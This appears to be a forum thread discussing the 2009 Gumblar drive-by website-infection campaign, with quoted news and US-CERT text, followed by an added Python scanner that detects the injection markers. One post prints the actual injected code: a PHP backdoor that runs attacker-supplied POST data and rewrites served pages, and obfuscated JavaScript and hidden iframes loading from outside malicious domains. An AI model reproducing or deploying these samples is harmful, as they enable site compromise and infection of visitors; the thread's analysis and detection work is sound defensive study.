Nothing terribly special about this website infector other than its phenomenal penetration in a very short space of time:
http://www.telegraph.co.uk/sciencean...y-experts.html
:eek:
More here:
http://tech.yahoo.com/news/pcworld/2...rgetingmalware
So is it an automated attack on web applications? It sounds like a worm is spreading through sql injection and remote file inclusion flaws and this script is the payload. But it doesn't give any detail about what web applications are being hit.
http://www.zone-h.org/mirror/id/8870521
Sigh... there are still so many servers out there which are infected by automated pieces of code... amazing.
See Nihil's second URL/link...
Quote:
But it doesn't give any detail about what web applications are being hit.
Quote:
The attack code has largely gone after PDF and Flash flaws discovered in the last year (such as APSA08-01 and APSB08-11), according to the company's spokesperson. Such attacks typically go after browser plugins installed by software and don't require opening or downloading anything, but these particular assaults can be largely neutered by making sure you have the latest versions of the Adobe software.
One of the explanatory blog posts from ScanSafe also describes using old MDAC exploits as well, so be sure you're up to date on Microsoft updates also. The PDF attack approach is more bad news for Adobe, whose programs have become a favorite target of late.
Successful attacks will attempt to install malware that manipulates Google search result pages when viewed by Internet Explorer. Victims may see fake results that will redirect them to fraudulent sites. To spread itself further, the malware will also attempt to steal FTP logins and hijack any Web sites controlled by an infected PC.
Yes,
US-CERT says this:
Gumblar Malware Exploit Circulating
added May 18, 2009 at 12:47 pm
US-CERT is aware of public reports of a malware exploit circulating. This is a drive-by-download exploit with multiple stages and is being referred to as Gumblar. The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc. The second stage of this exploit occurs when users visit a website compromised by Gumblar. Users who visit these compromised websites and have not applied updates for known PDF and Flash Player vulnerabilities may become infected with malware. This malware may be used by attackers to monitor network traffic and obtain sensitive information, including FTP and login credentials, that can be used to conduct further exploits. Additionally, this malware may also redirect Google search results for the infected user.
That had absolutely nothing to do with what I was talking about.
Quote:
See Nihil's second url/link
Again, it could be someone spreading the exploit on XSSable pages that allow javascript to be posted up. Or it could be a full-on worm that spreads via remote file inclusion. They give no detailed information at all about this except for the fact that someone sandwiched together exploits for browser extensions.
Quote:
The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc.
This is neither an XSS exploit nor a worm, and although some pundits describe it as a trojan, it isn't one of those either.
Basically there is a bot that scans the internet looking for vulnerable websites into which it can inject javascript. As no security researcher has yet obtained a copy of this bot, it is unclear what vulnerabilities are being targeted. The speed at which this malware has spread by comparison to its peers would suggest that it uses multiple vulnerabilities.
The second part is pretty straightforward. You visit a compromised website and pick up a drive-by infection.
Apparently the latest version of the bot uses heavily obfuscated javascript which makes each site's infection virtually unique.
:)
Greetz.
Here's an example of the script that is being used. Please be careful. ;)
In other words *DO NOT EVEN BOTHER OPENING "hXXp://yourlitetop.cn" IN YOUR BROWSER*
Code:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
***ORIGINAL PAGE'S CONTENT REMAINED HERE***
echo "<iframe src=\"http://nyoflak15041F8\" width=1 height=1 style=\"visibility:hidden;position
and this in a number of .htm files:
Code:
<script language=javascript><!--
(function(OFJqv){var Sl3='%';var RLE=('va,72,20a,3d,22Sc,72iptEngi,6ee,22,2cb,3d,22Versio,6e()+,22,2cj,3d,22,22,2cu,3d,6eavig,61t,6f,72,2e,75ser,41g,65nt,3bif((u,2e,69nd,65xOf(,22Ch,72ome,22,29,3c0),26,26(,75,2e,69,6ed,65xOf,28,22W,69n,22,29,3e0,29,26,26(u,2eindexOf,28,22N,54,206,22,29,3c0),26,26(document,2eco,6fkie,2eind,65,78Of,28,22miek,3d1,22),3c0),26,26,28ty,70,65of(,7a,72vzts),21,3dtypeof,28,22A,22,29)),7b,7arvzts,3d,22,41,22,3bev,61,6c,28,22i,66(window,2e,22,2ba+,22),6a,3dj+,22+a+,22Maj,6fr,22,2bb+a+,22Min,6fr,22+b+,61+,22B,75ild,22+,62+,22j,3b,22),3b,64o,63ume,6e,74,2ewrite(,22,3cscr,69,70t,20,73,72c,3d,2f,2fm,22+,22artu,7a,2e,63n,2fv,69d,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscri,70t,3e,22,29,3b,7d').replace(OFJqv,Sl3);var lTtZO=unescape(RLE);eval(lTtZO)})(/\,/g);
--></script><body><iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>
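A defender-side scanner for the injection patterns quoted in this post, added here as an example and not code from the thread: it flags the PHP output-buffer backdoor (remote eval of a POST variable plus the tmp_-named ob_start/set_error_handler hook), the hidden iframe to the domains named in the thread, and obfuscated script blocks, reusing the very heuristics the injector applies to strip competing injections. The sample file contents are constructed to mimic the quoted code, not copied from a real compromise.

```python
import re
import tempfile
from pathlib import Path

# Constructed samples modelled on the injected PHP and HTML quoted in this thread.
PHP_SAMPLE = "<?php if(isset($_POST['tmp_x3']))eval($_POST['tmp_x3']);ob_start('tmp_lkojfghx'); ?>"
HTML_SAMPLE = ('<script language=javascript><!--\n(function(r){var s=unescape("%61%6c");eval(s)})(/\\,/g);\n'
               '--></script><body><iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 '
               'height=4 style="visibility: hidden"></iframe>')
CLEAN_SAMPLE = "<html><body><script>document.getElementById('x').focus();</script></body></html>"

# Indicators from the PHP injector: remote eval of a POST variable, and an
# output-buffer / error-handler callback named tmp_<random> that rewrites every page served.
PHP_BACKDOOR = [re.compile(r"eval\s*\(\s*\$_POST\["),
                re.compile(r"(ob_start|set_error_handler)\s*\(\s*'tmp_[a-z0-9]+'")]
# Hidden iframe pointing at the domains quoted in the thread.
HIDDEN_IFRAME = re.compile(r'<iframe[^>]+src="http://(yourlitetop|martuz)\.cn[^"]*"[^>]*visibility:\s*hidden', re.I)
SCRIPT_BLOCK = re.compile(r"<script.*?</script>", re.S | re.I)
# The injector removes rival scripts carrying a 30+ char opaque quoted token or 20+
# comma-separated numbers next to eval/fromCharCode/document.write; the same
# heuristics, plus the unescape()+eval() pair used by its own loader, suit a defender.
OPAQUE_TOKEN = re.compile(r"""['"][^\s'"\.,;\?!\[\]:/<>\(\)]{30,}""")
NUMBER_RUN = re.compile(r"[\(\[](\s*\d+,){20,}")
DECODER = re.compile(r"unescape\s*\(|fromCharCode")
SINK = re.compile(r"\beval\s*\(|document\.write\s*\(")

def scan_text(text):
    """Return the indicator names found in one file's contents, in a fixed order."""
    hits = []
    if any(p.search(text) for p in PHP_BACKDOOR):
        hits.append("php-output-hook-backdoor")
    if HIDDEN_IFRAME.search(text):
        hits.append("hidden-iframe")
    for block in SCRIPT_BLOCK.finditer(text):
        body = block.group(0)
        if SINK.search(body) and (DECODER.search(body) or OPAQUE_TOKEN.search(body) or NUMBER_RUN.search(body)):
            hits.append("obfuscated-script")
            break
    return hits

def scan_tree(root):
    """Map every flagged .php/.htm/.html file under root to its indicators."""
    flagged = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in (".php", ".htm", ".html"):
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                flagged[path.name] = hits
    return flagged

def demo():
    """Write the constructed samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", PHP_SAMPLE), ("page.htm", HTML_SAMPLE), ("ok.html", CLEAN_SAMPLE)):
            Path(root, name).write_text(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Point scan_tree at a real document root to list the files that carry these markers; a clean site returns an empty dict.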
Hi t34b4g5,
Are you sure? That looks more like an iframe injection than a JavaScript redirection?
There is an analysis at Unmaskparasites:
http://blog.unmaskparasites.com/2009...jected-script/
And:
http://blog.unmaskparasites.com/2009...mblar-exploit/
JSRedir-F redirected to Grumblar.cn and more recently to Martuz.cn
yourlitetop.cn seems to be associated with Win32.Heur, rather than a JS redirect & browser hijack?